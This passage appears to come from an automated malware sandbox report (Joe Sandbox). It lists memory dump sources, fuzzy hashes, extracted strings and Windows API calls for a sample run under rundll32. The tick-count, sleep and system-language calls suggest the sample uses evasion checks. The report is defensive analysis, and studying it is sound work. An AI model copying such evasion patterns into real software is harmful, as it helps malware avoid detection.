                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$AttributesCloseCreateErrorHandleLast
                          • String ID:
                          • API String ID: 2927643983-0
                          • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                          • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                          • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: DefaultLanguageSystem
                          • String ID:
                          • API String ID: 4166810957-0
                          • Opcode ID: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                          • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                          • Opcode Fuzzy Hash: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                          • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 004155BB
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName
                          • String ID:
                          • API String ID: 514040917-0
                          • Opcode ID: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction ID: 501e22f373f49a8995146b0ee06b89f1180c0e2900e8ccb6f530d303bba059fa
                          • Opcode Fuzzy Hash: d11a0e43b40b78acf69311fe5df8e6df2ec459576eda087bd5762c40fa154f83
                          • Instruction Fuzzy Hash: 8B111532220A5098DB20EFB6C8957DA2765E7487CCF51202AFA4E47B99DF79C189C394
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • Sleep.KERNEL32 ref: 0080F91E
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CAC
                            • Part of subcall function 00813C90: Sleep.KERNEL32 ref: 00813CC5
                          • Sleep.KERNEL32 ref: 0080F98C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .exe$0~$ClassicIE_64$Romania Knives$bucket1$bucket2$bucket3
                          • API String ID: 3472027048-4255013377
                          • Opcode ID: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction ID: 5d250b9ed75b9a8aaf0cfb9770c26032a61d01ab42eb7c904a683a03c819acb6
                          • Opcode Fuzzy Hash: f255dd4eedc4a2de50590247ba1a38ad6c6e81a232c6d889f96da7bb08072170
                          • Instruction Fuzzy Hash: B671CD76210B85D8DB60EF66D8A13D93325F78479CF809026EB4D4BB6ADF78C649C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 0040DFA0: GetCurrentThreadId.KERNEL32 ref: 0040DFA8
                          • GetTickCount.KERNEL32 ref: 0040D9A6
                          • GetTickCount.KERNEL32 ref: 0040D9BF
                          • GetCurrentThreadId.KERNEL32 ref: 0040D9F9
                          • GetTickCount.KERNEL32 ref: 0040DA2C
                          • GetTickCount.KERNEL32 ref: 0040DA65
                          • GetTickCount.KERNEL32 ref: 0040DA93
                          • GetCurrentThreadId.KERNEL32 ref: 0040DB03
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: CountTick$CurrentThread
                          • String ID:
                          • API String ID: 3968769311-0
                          • Opcode ID: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction ID: c2a83c2f389e5ad77d80a0aa6aea5129f58ee2ceaede3d7cabad914c36d9a5fa
                          • Opcode Fuzzy Hash: c27ab6ce84736e3db08b9ecdd9d4f0a9594d1cf459156869239c16a0f0e74bf4
                          • Instruction Fuzzy Hash: B241D776B0560189DB145EBEC94035B3A60F78C7ACB16513BEE0EE37D4CA39C8898788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32 ref: 0040D60A
                          • GetProcAddress.KERNEL32 ref: 0040D619
                          • GetLogicalProcessorInformation.KERNEL32 ref: 0040D655
                          Strings
                          Memory Dump Source
                          • Source File: 0000000A.00000002.2901184491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000A.00000002.2901127754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901184491.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901840390.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901891803.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2901934450.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902025510.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902076409.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902152302.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902204134.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902236982.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902272171.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902309427.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902347529.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902400420.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902439834.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902479600.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902520212.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902558446.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902602427.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902644215.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902686895.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902728719.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902772728.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902814023.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902855228.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902902519.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2902947333.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903002028.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903045311.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903090260.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903138946.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903182602.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903230999.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903308167.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903345669.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903387901.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903431484.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903478244.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903528971.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 0000000A.00000002.2903582303.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
